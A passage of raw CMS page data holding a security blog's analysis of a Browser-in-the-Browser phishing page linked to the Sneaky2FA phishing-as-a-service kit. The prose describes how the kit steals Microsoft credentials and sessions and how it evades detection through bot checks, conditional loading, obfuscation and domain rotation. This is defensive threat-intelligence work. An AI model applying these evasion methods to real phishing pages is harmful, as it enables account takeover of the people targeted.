",[],{},{"nodeType":312,"data":49889,"content":49893},{"target":49890},{"sys":49891},{"id":49892,"type":317,"linkType":318},"7pkfAQquHrA6aUnCtj74iu",[],{"nodeType":178,"data":49895,"content":49896},{},[49897],{"nodeType":173,"value":49898,"marks":49899,"data":49900},"Upon clicking ‘Sign in with Microsoft” a reverse-proxy phishing page resembling a Microsoft login form is loaded in an embedded browser, with a custom background image designed to resemble a document library. ",[],{},{"nodeType":312,"data":49902,"content":49906},{"target":49903},{"sys":49904},{"id":49905,"type":317,"linkType":318},"782tw14AqgJ9mqneVaOdHc",[],{"nodeType":178,"data":49908,"content":49909},{},[49910],{"nodeType":173,"value":49911,"marks":49912,"data":49913},"Interestingly, the pop-up window adjusts to the visitor’s OS and browser — you can see some different examples below.",[],{},{"nodeType":312,"data":49915,"content":49919},{"target":49916},{"sys":49917},{"id":49918,"type":317,"linkType":318},"6lN9agEyeQ63LDHM1kaSqX",[],{"nodeType":178,"data":49921,"content":49922},{},[49923],{"nodeType":173,"value":49924,"marks":49925,"data":49926},"Completing authentication will result in the user’s Microsoft credentials and active session being stolen by the attacker, facilitating account takeover. ",[],{},{"nodeType":178,"data":49928,"content":49929},{},[49930],{"nodeType":173,"value":49931,"marks":49932,"data":49933},"You can see the sequence of pages loaded and Push detection events in the timeline below.",[],{},{"nodeType":312,"data":49935,"content":49939},{"target":49936},{"sys":49937},{"id":49938,"type":317,"linkType":318},"1oPpha39PMiJGUaZSptx1f",[],{"nodeType":231,"data":49941,"content":49942},{},[],{"nodeType":169,"data":49944,"content":49945},{},[49946],{"nodeType":173,"value":49947,"marks":49948,"data":49950},"Why Browser-in-the-Browser?",[49949],{"type":370},{},{"nodeType":178,"data":49952,"content":49953},{},[49954,49958,49967],{"nodeType":173,"value":49955,"marks":49956,"data":49957},"BITB was first coined as a technique in 2022 by ",[],{},{"nodeType":186,"data":49959,"content":49961},{"uri":49960},"https://mrd0x.com/browser-in-the-browser-phishing-attack/",[49962],{"nodeType":173,"value":49963,"marks":49964,"data":49966},"mr.d0x",[49965],{"type":194},{},{"nodeType":173,"value":49968,"marks":49969,"data":49970},", but standard AITM phishing pages are far more frequently encountered in the wild, particularly when it comes to enterprise business targets.",[],{},{"nodeType":178,"data":49972,"content":49973},{},[49974],{"nodeType":173,"value":49975,"marks":49976,"data":49977},"BITB is principally designed to mask suspicious phishing URLs by simulating a pretty normal function of in-browser authentication — a pop-up login form. BITB phishing pages replicate the design of a pop-up window with an iframe pointing to a malicious server. ",[],{},{"nodeType":178,"data":49979,"content":49980},{},[49981],{"nodeType":173,"value":49982,"marks":49983,"data":49984},"The pop-up browser window shows a legitimate Microsoft login URL — this is in fact a fake URL that is designed to fool the user. ",[],{},{"nodeType":312,"data":49986,"content":49990},{"target":49987},{"sys":49988},{"id":49989,"type":317,"linkType":318},"7kI5PHTr9XYQJ0xVJUnUDu",[],{"nodeType":178,"data":49992,"content":49993},{},[49994,49998,50005],{"nodeType":173,"value":49995,"marks":49996,"data":49997},"This BITB example shares many of the advantages of typical reverse-proxy based phishing pages, as well as the ",[],{},{"nodeType":186,"data":49999,"content":50000},{"uri":6820},[50001],{"nodeType":173,"value":8157,"marks":50002,"data":50004},[50003],{"type":194},{},{"nodeType":173,"value":50006,"marks":50007,"data":50008}," that are commonly used by attackers (and baked into PhaaS kits off-the-shelf). This includes:",[],{},{"nodeType":235,"data":50010,"content":50011},{},[50012],{"nodeType":173,"value":50013,"marks":50014,"data":50016},"Bot protection to defeat web scraping tools",[50015],{"type":370},{},{"nodeType":178,"data":50018,"content":50019},{},[50020,50024,50033],{"nodeType":173,"value":50021,"marks":50022,"data":50023},"Attackers are using common ",[],{},{"nodeType":186,"data":50025,"content":50027},{"uri":50026},"https://phishing-techniques.pushsecurity.com/techniques/bot-protection/",[50028],{"nodeType":173,"value":50029,"marks":50030,"data":50032},"bot protection",[50031],{"type":194},{},{"nodeType":173,"value":50034,"marks":50035,"data":50036}," technologies like CAPTCHA and Cloudflare Turnstile to prevent security bots from accessing their web pages to be able to analyse them (and therefore block pages from being automatically flagged). This requires anyone visiting the page to pass a bot check/challenge before the page can be loaded, meaning the full page cannot be analysed by automated tools. ",[],{},{"nodeType":235,"data":50038,"content":50039},{},[50040],{"nodeType":173,"value":50041,"marks":50042,"data":50044},"Stop unwanted visitors with conditional loading",[50043],{"type":370},{},{"nodeType":178,"data":50046,"content":50047},{},[50048,50051,50059],{"nodeType":173,"value":37,"marks":50049,"data":50050},[],{},{"nodeType":186,"data":50052,"content":50053},{"uri":7853},[50054],{"nodeType":173,"value":50055,"marks":50056,"data":50058},"Conditional loading",[50057],{"type":194},{},{"nodeType":173,"value":50060,"marks":50061,"data":50062}," techniques are used to prevent unwanted visitors from accessing the phishing page — reducing the chance that it is detected and flagged and extending the longevity of the phish. This often includes known security vendor IPs, VPN/proxy services, but is often used to target specific organizations (or even specific users within an organization). ",[],{},{"nodeType":178,"data":50064,"content":50065},{},[50066],{"nodeType":173,"value":50067,"marks":50068,"data":50069},"In this case, where the correct parameters are not supplied or the phishing site detects an unwanted variable, it will redirect to a benign wikibooks page. ",[],{},{"nodeType":312,"data":50071,"content":50075},{"target":50072},{"sys":50073},{"id":50074,"type":317,"linkType":318},"fN2XugiDIef8haTDapViT",[],{"nodeType":178,"data":50077,"content":50078},{},[50079,50083,50091,50095,50104],{"nodeType":173,"value":50080,"marks":50081,"data":50082},"Sneaky2FA has also been commonly observed using ",[],{},{"nodeType":186,"data":50084,"content":50085},{"uri":42062},[50086],{"nodeType":173,"value":50087,"marks":50088,"data":50090},"anti-analysis",[50089],{"type":194},{},{"nodeType":173,"value":50092,"marks":50093,"data":50094}," techniques to detect or ",[],{},{"nodeType":186,"data":50096,"content":50098},{"uri":50097},"https://blog.sekoia.io/sneaky-2fa-exposing-a-new-aitm-phishing-as-a-service/#:~:text=Sneaky%202FA%20pages%20use%20anti,we%20identified%20as%20Sneaky%202FA",[50099],{"nodeType":173,"value":50100,"marks":50101,"data":50103},"disable browser developer tools",[50102],{"type":194},{},{"nodeType":173,"value":50105,"marks":50106,"data":50107}," to block attempts to analyse the page for malicious content. ",[],{},{"nodeType":235,"data":50109,"content":50110},{},[50111],{"nodeType":173,"value":50112,"marks":50113,"data":50115},"Page and code obfuscation",[50114],{"type":370},{},{"nodeType":178,"data":50117,"content":50118},{},[50119,50123,50132,50136,50145],{"nodeType":173,"value":50120,"marks":50121,"data":50122},"The HTML and JavaScript of Sneaky2FA pages are ",[],{},{"nodeType":186,"data":50124,"content":50126},{"uri":50125},"https://phishing-techniques.pushsecurity.com/techniques/page-obfuscation/",[50127],{"nodeType":173,"value":50128,"marks":50129,"data":50131},"heavily obfuscated",[50130],{"type":194},{},{"nodeType":173,"value":50133,"marks":50134,"data":50135}," to evade static detection and pattern-matching, ",[],{},{"nodeType":186,"data":50137,"content":50139},{"uri":50138},"https://blog.sekoia.io/sneaky-2fa-exposing-a-new-aitm-phishing-as-a-service/#:~:text=,%E2%80%9CNo%20account%3F%E2%80%9D%20and%20%E2%80%9CSign%20in%E2%80%9D",[50140],{"nodeType":173,"value":50141,"marks":50142,"data":50144},"such as",[50143],{"type":194},{},{"nodeType":173,"value":50146,"marks":50147,"data":50148}," breaking up UI text with invisible tags, embedding background and interface elements as encoded images instead of text, and other changes that are invisible to the user, but make it hard for scanning tools to fingerprint the page. ",[],{},{"nodeType":235,"data":50150,"content":50151},{},[50152],{"nodeType":173,"value":50153,"marks":50154,"data":50156},"Domain rotation and URL masking",[50155],{"type":370},{},{"nodeType":178,"data":50158,"content":50159},{},[50160,50164,50173],{"nodeType":173,"value":50161,"marks":50162,"data":50163},"In addition to masking the phishing site URL presented to the user via the BITB window, Sneaky2FA has been seen using ",[],{},{"nodeType":186,"data":50165,"content":50167},{"uri":50166},"https://www.centripetal.ai/threat-research/typhoon-versus-sneaky",[50168],{"nodeType":173,"value":50169,"marks":50170,"data":50172},"stealthy hosting and domain tactics",[50171],{"type":194},{},{"nodeType":173,"value":50174,"marks":50175,"data":50176},". Each campaign uses a fresh, long, randomized URL (typically a 150-character path) on a benign-looking domain (often an old or compromised site). These domains are usually short-lived: many are taken down after just a few days or weeks. Analysts have observed that Sneaky2FA domains often lie dormant or serve harmless content until right before an attack, then quickly vanish after use. This “burn-and-replace” approach makes traditional defenses (which rely on domain reputation or pattern-matching) much weaker.",[],{},{"nodeType":312,"data":50178,"content":50181},{"target":50179},{"sys":50180},{"id":8590,"type":317,"linkType":318},[],{"nodeType":231,"data":50183,"content":50184},{},[],{"nodeType":169,"data":50186,"content":50187},{},[50188],{"nodeType":173,"value":50189,"marks":50190,"data":50192},"Are attackers moving to BITB? ",[50191],{"type":370},{},{"nodeType":178,"data":50194,"content":50195},{},[50196,50200,50209],{"nodeType":173,"value":50197,"marks":50198,"data":50199},"There is evidence that Sneaky2FAs shift to BITB might not be an isolated change. Raccoon0365 is another PhaaS service that has been seen utilizing BITB functionality after ",[],{},{"nodeType":186,"data":50201,"content":50203},{"uri":50202},"https://www.cloudflare.com/en-gb/threat-intelligence/research/report/cloudflare-participates-in-global-operation-to-disrupt-raccoono365/",[50204],{"nodeType":173,"value":50205,"marks":50206,"data":50208},"announcing a “BITB mini-panel”",[50207],{"type":194},{},{"nodeType":173,"value":50210,"marks":50211,"data":50212}," would be added as part of a service revamp. ",[],{},{"nodeType":312,"data":50214,"content":50218},{"target":50215},{"sys":50216},{"id":50217,"type":317,"linkType":318},"2sJUR9TVbZMU1v10Tq94Pz",[],{"nodeType":231,"data":50220,"content":50221},{},[],{"nodeType":169,"data":50223,"content":50224},{},[50225],{"nodeType":173,"value":40632,"marks":50226,"data":50228},[50227],{"type":370},{},{"nodeType":178,"data":50230,"content":50231},{},[50232],{"nodeType":173,"value":50233,"marks":50234,"data":50235},"Attackers are continuously innovating their phishing techniques, particularly in the context of an increasingly professionalized PhaaS ecosystem. With identity-based attacks continuing to be the leading cause of breaches, attackers are incentivized to refine and enhance their phishing infrastructure. ",[],{},{"nodeType":178,"data":50237,"content":50238},{},[50239],{"nodeType":173,"value":50240,"marks":50241,"data":50242},"The addition of BITB, with the frequent iteration and improvement of detection evasion techniques, means that traditional security controls such as email gateways, web filters, and signature-based defenses will continue to be reliably bypassed. ",[],{},{"nodeType":231,"data":50244,"content":50245},{},[],{"nodeType":169,"data":50247,"content":50248},{},[50249],{"nodeType":173,"value":1422,"marks":50250,"data":50252},[50251],{"type":370},{},{"nodeType":178,"data":50254,"content":50255},{},[50256],{"nodeType":173,"value":42238,"marks":50257,"data":50258},[],{},{"nodeType":178,"data":50260,"content":50261},{},[50262],{"nodeType":173,"value":50263,"marks":50264,"data":50265},"Despite the various detection evasion techniques, and the use of BITB methods, Push still detected this toolkit running on the page, enabling any attack to be detected and blocked before the user could be phished. Because we can inspect the live page, we detect malicious content loaded in the browser in real time. ",[],{},{"nodeType":178,"data":50267,"content":50268},{},[50269,50272,50278,50281,50287],{"nodeType":173,"value":1451,"marks":50270,"data":50271},[],{},{"nodeType":186,"data":50273,"content":50274},{"uri":1456},[50275],{"nodeType":173,"value":1459,"marks":50276,"data":50277},[],{},{"nodeType":173,"value":1464,"marks":50279,"data":50280},[],{},{"nodeType":186,"data":50282,"content":50283},{"uri":1469},[50284],{"nodeType":173,"value":1472,"marks":50285,"data":50286},[],{},{"nodeType":173,"value":1477,"marks":50288,"data":50289},[],{},{"nodeType":312,"data":50291,"content":50294},{"target":50292},{"sys":50293},{"id":8590,"type":317,"linkType":318},[],{"nodeType":178,"data":50296,"content":50297},{},[50298],{"nodeType":173,"value":37,"marks":50299,"data":50300},[],{},"Analyzing a BITB phishing page linked to the Sneaky2FA Phishing-as-a-Service operation. ","2025-11-18T00:00:00.000Z",{"items":50304},[50305,50307],{"sys":50306,"name":505},{"id":504},{"sys":50308,"name":509},{"id":508},{"items":50310},[50311],{"fullName":1493,"firstName":3975,"jobTitle":1494,"profilePicture":50312},{"url":1496},{"__typename":1528,"sys":50314,"content":50315,"title":21090,"synopsis":21091,"hashTags":118,"publishedDate":21092,"slug":21093,"tagsCollection":50812,"authorsCollection":50818},{"id":20516},{"json":50316},{"nodeType":165,"data":50317,"content":50318},{},[50319,50325,50331,50341,50346,50352,50355,50362,50368,50373,50386,50392,50413,50419,50424,50427,50434,50460,50465,50481,50486,50502,50508,50513,50516,50523,50529,50545,50551,50567,50573,50578,50581,50588,50594,50624,50630,50636,50676,50691,50700,50706,50709,50716,50732,50738,50744,50749,50752,50759,50775,50801,50806],{"nodeType":178,"data":50320,"content":50321},{},[50322],{"nodeType":173,"value":20525,"marks":50323,"data":50324},[],{},{"nodeType":178,"data":50326,"content":50327},{},[50328],{"nodeType":173,"value":20532,"marks":50329,"data":50330},[],{},{"nodeType":178,"data":50332,"content":50333},{},[50334,50337],{"nodeType":173,"value":20539,"marks":50335,"data":50336},[],{},{"nodeType":173,"value":20543,"marks":50338,"data":50340},[50339],{"type":370},{},{"nodeType":312,"data":50342,"content":50345},{"target":50343},{"sys":50344},{"id":8032,"type":317,"linkType":318},[],{"nodeType":178,"data":50347,"content":50348},{},[50349],{"nodeType":173,"value":20556,"marks":50350,"data":50351},[],{},{"nodeType":231,"data":50353,"content":50354},{},[],{"nodeType":169,"data":50356,"content":50357},{},[50358],{"nodeType":173,"value":20566,"marks":50359,"data":50361},[50360],{"type":370},{},{"nodeType":178,"data":50363,"content":50364},{},[50365],{"nodeType":173,"value":20574,"marks":50366,"data":50367},[],{},{"nodeType":312,"data":50369,"content":50372},{"target":50370},{"sys":50371},{"id":20581,"type":317,"linkType":318},[],{"nodeType":178,"data":50374,"content":50375},{},[50376,50379,50383],{"nodeType":173,"value":20587,"marks":50377,"data":50378},[],{},{"nodeType":173,"value":20591,"marks":50380,"data":50382},[50381],{"type":370},{},{"nodeType":173,"value":20596,"marks":50384,"data":50385},[],{},{"nodeType":178,"data":50387,"content":50388},{},[50389],{"nodeType":173,"value":20603,"marks":50390,"data":50391},[],{},{"nodeType":250,"data":50393,"content":50394},{},[50395,50404],{"nodeType":254,"data":50396,"content":50397},{},[50398],{"nodeType":178,"data":50399,"content":50400},{},[50401],{"nodeType":173,"value":20616,"marks":50402,"data":50403},[],{},{"nodeType":254,"data":50405,"content":50406},{},[50407],{"nodeType":178,"data":50408,"content":50409},{},[50410],{"nodeType":173,"value":20626,"marks":50411,"data":50412},[],{},{"nodeType":178,"data":50414,"content":50415},{},[50416],{"nodeType":173,"value":20633,"marks":50417,"data":50418},[],{},{"nodeType":312,"data":50420,"content":50423},{"target":50421},{"sys":50422},{"id":20640,"type":317,"linkType":318},[],{"nodeType":231,"data":50425,"content":50426},{},[],{"nodeType":169,"data":50428,"content":50429},{},[50430],{"nodeType":173,"value":20649,"marks":50431,"data":50433},[50432],{"type":370},{},{"nodeType":178,"data":50435,"content":50436},{},[50437,50440,50447,50450,50457],{"nodeType":173,"value":20657,"marks":50438,"data":50439},[],{},{"nodeType":186,"data":50441,"content":50442},{"uri":8043},[50443],{"nodeType":173,"value":20664,"marks":50444,"data":50446},[50445],{"type":194},{},{"nodeType":173,"value":20669,"marks":50448,"data":50449},[],{},{"nodeType":186,"data":50451,"content":50452},{"uri":20674},[50453],{"nodeType":173,"value":20677,"marks":50454,"data":50456},[50455],{"type":194},{},{"nodeType":173,"value":20682,"marks":50458,"data":50459},[],{},{"nodeType":312,"data":50461,"content":50464},{"target":50462},{"sys":50463},{"id":20689,"type":317,"linkType":318},[],{"nodeType":178,"data":50466,"content":50467},{},[50468,50471,50478],{"nodeType":173,"value":20695,"marks":50469,"data":50470},[],{},{"nodeType":186,"data":50472,"content":50473},{"uri":20700},[50474],{"nodeType":173,"value":20703,"marks":50475,"data":50477},[50476],{"type":194},{},{"nodeType":173,"value":197,"marks":50479,"data":50480},[],{},{"nodeType":312,"data":50482,"content":50485},{"target":50483},{"sys":50484},{"id":20714,"type":317,"linkType":318},[],{"nodeType":178,"data":50487,"content":50488},{},[50489,50492,50499],{"nodeType":173,"value":20720,"marks":50490,"data":50491},[],{},{"nodeType":186,"data":50493,"content":50494},{"uri":20725},[50495],{"nodeType":173,"value":8157,"marks":50496,"data":50498},[50497],{"type":194},{},{"nodeType":173,"value":20732,"marks":50500,"data":50501},[],{},{"nodeType":178,"data":50503,"content":50504},{},[50505],{"nodeType":173,"value":20739,"marks":50506,"data":50507},[],{},{"nodeType":312,"data":50509,"content":50512},{"target":50510},{"sys":50511},{"id":20746,"type":317,"linkType":318},[],{"nodeType":231,"data":50514,"content":50515},{},[],{"nodeType":169,"data":50517,"content":50518},{},[50519],{"nodeType":173,"value":20755,"marks":50520,"data":50522},[50521],{"type":370},{},{"nodeType":178,"data":50524,"content":50525},{},[50526],{"nodeType":173,"value":20763,"marks":50527,"data":50528},[],{},{"nodeType":178,"data":50530,"content":50531},{},[50532,50535,50542],{"nodeType":173,"value":20770,"marks":50533,"data":50534},[],{},{"nodeType":186,"data":50536,"content":50537},{"uri":20775},[50538],{"nodeType":173,"value":20778,"marks":50539,"data":50541},[50540],{"type":194},{},{"nodeType":173,"value":20783,"marks":50543,"data":50544},[],{},{"nodeType":178,"data":50546,"content":50547},{},[50548],{"nodeType":173,"value":20790,"marks":50549,"data":50550},[],{},{"nodeType":178,"data":50552,"content":50553},{},[50554,50557,50564],{"nodeType":173,"value":20797,"marks":50555,"data":50556},[],{},{"nodeType":186,"data":50558,"content":50559},{"uri":20802},[50560],{"nodeType":173,"value":20805,"marks":50561,"data":50563},[50562],{"type":194},{},{"nodeType":173,"value":20810,"marks":50565,"data":50566},[],{},{"nodeType":178,"data":50568,"content":50569},{},[50570],{"nodeType":173,"value":20817,"marks":50571,"data":50572},[],{},{"nodeType":312,"data":50574,"content":50577},{"target":50575},{"sys":50576},{"id":20824,"type":317,"linkType":318},[],{"nodeType":231,"data":50579,"content":50580},{},[],{"nodeType":169,"data":50582,"content":50583},{},[50584],{"nodeType":173,"value":20833,"marks":50585,"data":50587},[50586],{"type":370},{},{"nodeType":178,"data":50589,"content":50590},{},[50591],{"nodeType":173,"value":20841,"marks":50592,"data":50593},[],{},{"nodeType":250,"data":50595,"content":50596},{},[50597,50606,50615],{"nodeType":254,"data":50598,"content":50599},{},[50600],{"nodeType":178,"data":50601,"content":50602},{},[50603],{"nodeType":173,"value":20854,"marks":50604,"data":50605},[],{},{"nodeType":254,"data":50607,"content":50608},{},[50609],{"nodeType":178,"data":50610,"content":50611},{},[50612],{"nodeType":173,"value":20864,"marks":50613,"data":50614},[],{},{"nodeType":254,"data":50616,"content":50617},{},[50618],{"nodeType":178,"data":50619,"content":50620},{},[50621],{"nodeType":173,"value":20874,"marks":50622,"data":50623},[],{},{"nodeType":178,"data":50625,"content":50626},{},[50627],{"nodeType":173,"value":20881,"marks":50628,"data":50629},[],{},{"nodeType":178,"data":50631,"content":50632},{},[50633],{"nodeType":173,"value":20888,"marks":50634,"data":50635},[],{},{"nodeType":250,"data":50637,"content":50638},{},[50639,50658,50667],{"nodeType":254,"data":50640,"content":50641},{},[50642],{"nodeType":178,"data":50643,"content":50644},{},[50645,50648,50655],{"nodeType":173,"value":20901,"marks":50646,"data":50647},[],{},{"nodeType":186,"data":50649,"content":50650},{"uri":20906},[50651],{"nodeType":173,"value":20909,"marks":50652,"data":50654},[50653],{"type":194},{},{"nodeType":173,"value":20914,"marks":50656,"data":50657},[],{},{"nodeType":254,"data":50659,"content":50660},{},[50661],{"nodeType":178,"data":50662,"content":50663},{},[50664],{"nodeType":173,"value":20924,"marks":50665,"data":50666},[],{},{"nodeType":254,"data":50668,"content":50669},{},[50670],{"nodeType":178,"data":50671,"content":50672},{},[50673],{"nodeType":173,"value":20934,"marks":50674,"data":50675},[],{},{"nodeType":178,"data":50677,"content":50678},{},[50679,50682,50688],{"nodeType":173,"value":20941,"marks":50680,"data":50681},[],{},{"nodeType":186,"data":50683,"content":50684},{"uri":1252},[50685],{"nodeType":173,"value":20948,"marks":50686,"data":50687},[],{},{"nodeType":173,"value":20952,"marks":50689,"data":50690},[],{},{"nodeType":3769,"data":50692,"content":50693},{},[50694],{"nodeType":178,"data":50695,"content":50696},{},[50697],{"nodeType":173,"value":20962,"marks":50698,"data":50699},[],{},{"nodeType":178,"data":50701,"content":50702},{},[50703],{"nodeType":173,"value":20969,"marks":50704,"data":50705},[],{},{"nodeType":231,"data":50707,"content":50708},{},[],{"nodeType":169,"data":50710,"content":50711},{},[50712],{"nodeType":173,"value":20979,"marks":50713,"data":50715},[50714],{"type":370},{},{"nodeType":178,"data":50717,"content":50718},{},[50719,50722,50729],{"nodeType":173,"value":20987,"marks":50720,"data":50721},[],{},{"nodeType":186,"data":50723,"content":50724},{"uri":20992},[50725],{"nodeType":173,"value":20995,"marks":50726,"data":50728},[50727],{"type":194},{},{"nodeType":173,"value":21000,"marks":50730,"data":50731},[],{},{"nodeType":178,"data":50733,"content":50734},{},[50735],{"nodeType":173,"value":21007,"marks":50736,"data":50737},[],{},{"nodeType":178,"data":50739,"content":50740},{},[50741],{"nodeType":173,"value":21014,"marks":50742,"data":50743},[],{},{"nodeType":312,"data":50745,"content":50748},{"target":50746},{"sys":50747},{"id":21021,"type":317,"linkType":318},[],{"nodeType":231,"data":50750,"content":50751},{},[],{"nodeType":169,"data":50753,"content":50754},{},[50755],{"nodeType":173,"value":18605,"marks":50756,"data":50758},[50757],{"type":370},{},{"nodeType":178,"data":50760,"content":50761},{},[50762,50765,50772],{"nodeType":173,"value":21037,"marks":50763,"data":50764},[],{},{"nodeType":186,"data":50766,"content":50767},{"uri":21042},[50768],{"nodeType":173,"value":21045,"marks":50769,"data":50771},[50770],{"type":194},{},{"nodeType":173,"value":21050,"marks":50773,"data":50774},[],{},{"nodeType":178,"data":50776,"content":50777},{},[50778,50781,50788,50791,50798],{"nodeType":173,"value":1451,"marks":50779,"data":50780},[],{},{"nodeType":186,"data":50782,"content":50783},{"uri":1456},[50784],{"nodeType":173,"value":1459,"marks":50785,"data":50787},[50786],{"type":194},{},{"nodeType":173,"value":1464,"marks":50789,"data":50790},[],{},{"nodeType":186,"data":50792,"content":50793},{"uri":1469},[50794],{"nodeType":173,"value":1472,"marks":50795,"data":50797},[50796],{"type":194},{},{"nodeType":173,"value":1477,"marks":50799,"data":50800},[],{},{"nodeType":312,"data":50802,"content":50805},{"target":50803},{"sys":50804},{"id":20640,"type":317,"linkType":318},[],{"nodeType":178,"data":50807,"content":50808},{},[50809],{"nodeType":173,"value":37,"marks":50810,"data":50811},[],{},{"items":50813},[50814,50816],{"sys":50815,"name":509},{"id":508},{"sys":50817,"name":505},{"id":504},{"items":50819},[50820],{"fullName":1493,"firstName":3975,"jobTitle":1494,"profilePicture":50821},{"url":1496},{"items":50823},[50824],{"fullName":8611,"firstName":8612,"jobTitle":8613,"profilePicture":50825},{"url":8615},{"json":50827,"links":51562},{"nodeType":165,"data":50828,"content":50829},{},[50830,50837,50843,50849,50855,50865,50871,50876,50881,50884,50891,50897,50903,50908,50924,50930,50935,50941,50946,50952,50991,50996,51001,51007,51013,51016,51023,51039,51045,51050,51066,51071,51087,51093,51096,51103,51109,51145,51155,51158,51165,51180,51186,51199,51205,51211,51216,51222,51225,51232,51238,51286,51292,51295,51302,51307,51313,51319,51324,51330,51359,51365,51371,51376,51382,51387,51394,51410,51416,51446,51452,51482,51485,51492,51498,51503,51519,51525,51551,51556],{"nodeType":169,"data":50831,"content":50832},{},[50833],{"nodeType":173,"value":7757,"marks":50834,"data":50836},[50835],{"type":370},{},{"nodeType":178,"data":50838,"content":50839},{},[50840],{"nodeType":173,"value":7765,"marks":50841,"data":50842},[],{},{"nodeType":178,"data":50844,"content":50845},{},[50846],{"nodeType":173,"value":7772,"marks":50847,"data":50848},[],{},{"nodeType":178,"data":50850,"content":50851},{},[50852],{"nodeType":173,"value":7779,"marks":50853,"data":50854},[],{},{"nodeType":178,"data":50856,"content":50857},{},[50858,50862],{"nodeType":173,"value":7786,"marks":50859,"data":50861},[50860],{"type":370},{},{"nodeType":173,"value":7791,"marks":50863,"data":50864},[],{},{"nodeType":178,"data":50866,"content":50867},{},[50868],{"nodeType":173,"value":7798,"marks":50869,"data":50870},[],{},{"nodeType":312,"data":50872,"content":50875},{"target":50873},{"sys":50874},{"id":7805,"type":317,"linkType":318},[],{"nodeType":312,"data":50877,"content":50880},{"target":50878},{"sys":50879},{"id":7811,"type":317,"linkType":318},[],{"nodeType":231,"data":50882,"content":50883},{},[],{"nodeType":169,"data":50885,"content":50886},{},[50887],{"nodeType":173,"value":7820,"marks":50888,"data":50890},[50889],{"type":370},{},{"nodeType":178,"data":50892,"content":50893},{},[50894],{"nodeType":173,"value":7828,"marks":50895,"data":50896},[],{},{"nodeType":178,"data":50898,"content":50899},{},[50900],{"nodeType":173,"value":7835,"marks":50901,"data":50902},[],{},{"nodeType":312,"data":50904,"content":50907},{"target":50905},{"sys":50906},{"id":7842,"type":317,"linkType":318},[],{"nodeType":178,"data":50909,"content":50910},{},[50911,50914,50921],{"nodeType":173,"value":7848,"marks":50912,"data":50913},[],{},{"nodeType":186,"data":50915,"content":50916},{"uri":7853},[50917],{"nodeType":173,"value":7856,"marks":50918,"data":50920},[50919],{"type":194},{},{"nodeType":173,"value":7861,"marks":50922,"data":50923},[],{},{"nodeType":178,"data":50925,"content":50926},{},[50927],{"nodeType":173,"value":7868,"marks":50928,"data":50929},[],{},{"nodeType":312,"data":50931,"content":50934},{"target":50932},{"sys":50933},{"id":7875,"type":317,"linkType":318},[],{"nodeType":178,"data":50936,"content":50937},{},[50938],{"nodeType":173,"value":7881,"marks":50939,"data":50940},[],{},{"nodeType":312,"data":50942,"content":50945},{"target":50943},{"sys":50944},{"id":7888,"type":317,"linkType":318},[],{"nodeType":178,"data":50947,"content":50948},{},[50949],{"nodeType":173,"value":7894,"marks":50950,"data":50951},[],{},{"nodeType":250,"data":50953,"content":50954},{},[50955,50964,50973,50982],{"nodeType":254,"data":50956,"content":50957},{},[50958],{"nodeType":178,"data":50959,"content":50960},{},[50961],{"nodeType":173,"value":7907,"marks":50962,"data":50963},[],{},{"nodeType":254,"data":50965,"content":50966},{},[50967],{"nodeType":178,"data":50968,"content":50969},{},[50970],{"nodeType":173,"value":7917,"marks":50971,"data":50972},[],{},{"nodeType":254,"data":50974,"content":50975},{},[50976],{"nodeType":178,"data":50977,"content":50978},{},[50979],{"nodeType":173,"value":7927,"marks":50980,"data":50981},[],{},{"nodeType":254,"data":50983,"content":50984},{},[50985],{"nodeType":178,"data":50986,"content":50987},{},[50988],{"nodeType":173,"value":7937,"marks":50989,"data":50990},[],{},{"nodeType":312,"data":50992,"content":50995},{"target":50993},{"sys":50994},{"id":7944,"type":317,"linkType":318},[],{"nodeType":312,"data":50997,"content":51000},{"target":50998},{"sys":50999},{"id":7950,"type":317,"linkType":318},[],{"nodeType":178,"data":51002,"content":51003},{},[51004],{"nodeType":173,"value":7956,"marks":51005,"data":51006},[],{},{"nodeType":178,"data":51008,"content":51009},{},[51010],{"nodeType":173,"value":7963,"marks":51011,"data":51012},[],{},{"nodeType":231,"data":51014,"content":51015},{},[],{"nodeType":169,"data":51017,"content":51018},{},[51019],{"nodeType":173,"value":7973,"marks":51020,"data":51022},[51021],{"type":370},{},{"nodeType":178,"data":51024,"content":51025},{},[51026,51029,51036],{"nodeType":173,"value":7981,"marks":51027,"data":51028},[],{},{"nodeType":186,"data":51030,"content":51031},{"uri":7986},[51032],{"nodeType":173,"value":7989,"marks":51033,"data":51035},[51034],{"type":194},{},{"nodeType":173,"value":7994,"marks":51037,"data":51038},[],{},{"nodeType":178,"data":51040,"content":51041},{},[51042],{"nodeType":173,"value":8001,"marks":51043,"data":51044},[],{},{"nodeType":312,"data":51046,"content":51049},{"target":51047},{"sys":51048},{"id":8008,"type":317,"linkType":318},[],{"nodeType":178,"data":51051,"content":51052},{},[51053,51056,51063],{"nodeType":173,"value":8014,"marks":51054,"data":51055},[],{},{"nodeType":186,"data":51057,"content":51058},{"uri":1842},[51059],{"nodeType":173,"value":8021,"marks":51060,"data":51062},[51061],{"type":194},{},{"nodeType":173,"value":1477,"marks":51064,"data":51065},[],{},{"nodeType":312,"data":51067,"content":51070},{"target":51068},{"sys":51069},{"id":8032,"type":317,"linkType":318},[],{"nodeType":178,"data":51072,"content":51073},{},[51074,51077,51084],{"nodeType":173,"value":8038,"marks":51075,"data":51076},[],{},{"nodeType":186,"data":51078,"content":51079},{"uri":8043},[51080],{"nodeType":173,"value":8046,"marks":51081,"data":51083},[51082],{"type":194},{},{"nodeType":173,"value":8051,"marks":51085,"data":51086},[],{},{"nodeType":178,"data":51088,"content":51089},{},[51090],{"nodeType":173,"value":8058,"marks":51091,"data":51092},[],{},{"nodeType":231,"data":51094,"content":51095},{},[],{"nodeType":169,"data":51097,"content":51098},{},[51099],{"nodeType":173,"value":8068,"marks":51100,"data":51102},[51101],{"type":370},{},{"nodeType":178,"data":51104,"content":51105},{},[51106],{"nodeType":173,"value":8076,"marks":51107,"data":51108},[],{},{"nodeType":178,"data":51110,"content":51111},{},[51112,51115,51122,51125,51132,51135,51142],{"nodeType":173,"value":8083,"marks":51113,"data":51114},[],{},{"nodeType":186,"data":51116,"content":51117},{"uri":8088},[51118],{"nodeType":173,"value":8091,"marks":51119,"data":51121},[51120],{"type":194},{},{"nodeType":173,"value":933,"marks":51123,"data":51124},[],{},{"nodeType":186,"data":51126,"content":51127},{"uri":8100},[51128],{"nodeType":173,"value":1812,"marks":51129,"data":51131},[51130],{"type":194},{},{"nodeType":173,"value":8107,"marks":51133,"data":51134},[],{},{"nodeType":186,"data":51136,"content":51137},{"uri":8112},[51138],{"nodeType":173,"value":8115,"marks":51139,"data":51141},[51140],{"type":194},{},{"nodeType":173,"value":8120,"marks":5